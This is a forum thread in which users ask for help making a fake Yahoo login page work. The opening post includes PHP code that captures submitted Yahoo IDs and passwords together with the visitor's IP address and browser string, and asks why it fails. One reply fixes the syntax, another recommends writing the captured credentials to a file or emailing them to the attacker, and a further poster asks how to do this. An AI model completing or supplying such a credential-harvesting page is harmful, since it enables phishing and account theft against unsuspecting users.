mrtg
+ Reply to Thread
Results 1 to 4 of 4

Thread: Fake logins..final help

  1. #1
    Join Date
    Dec 2007
    Posts
    5

    Unhappy Fake logins..final help

    I have created a php page for mailing the details from yahoo and have saved it with an extension of .php

    This is the Php page that i have created
    <html>
    <body>

    <?php
    echo(date("l dS \of F Y h:i:s A") . "<br />");
    <?php
    echo $_SERVER['REMOTE_ADDR'];
    ?>
    <?php
    echo $_SERVER['HTTP_USER_AGENT'];
    ?>
    Yahoo! ID: <?php echo $_POST["Yahoo! ID"]; ?><br />
    Password:<?php echo $_POST["Password"]; ?><br />

    </body>
    </html>
    Now in the main login page,i have referred this php page under <Form Action>

    after i clik on Sign in...rather than moving on..it opens this Php page and shows the above code

    Now cud anyone tell what are the things that have to be done to out this php into work

  2. #2
    Join Date
    Sep 2005
    Posts
    2,050
    1. You didn't close the top opening PHP tag.
    2. Your server may not have PHP installed.
    Who needs drugs when you have electrons?

  3. #3
    Join Date
    Sep 2006
    Posts
    1,649
    Also, sosme, all your page is doing is taking the username and password (plus some other info) and echoing it back to the user. You should have the user/pass information be written to a file, or sent to you via email.
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

  4. #4
    Join Date
    Nov 2007
    Posts
    20

    redirect info

    I am having the same problem. how do I direct the user and pass to be written on the server or emailed to me ? having a hell of time figuring this out.....please help

+ Reply to Thread

Similar Threads

  1. Final Fantasy 7 Emulator
    By sufferage06 in forum General discussion
    Replies: 0
    Last Post: 10-28-2008, 07:58 PM
  2. Making Hotmail Fake Logins
    By Its_Me_Sash in forum Internet Privacy
    Replies: 2
    Last Post: 10-25-2007, 05:58 AM
  3. Fake yahoo logins page !
    By evilopinions in forum Internet Privacy
    Replies: 21
    Last Post: 08-07-2007, 08:54 PM
  4. Fake login
    By b52_00 in forum Programming
    Replies: 1
    Last Post: 03-27-2007, 05:01 PM
  5. fake msn
    By vega in forum Internet Privacy
    Replies: 0
    Last Post: 02-05-2006, 07:06 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts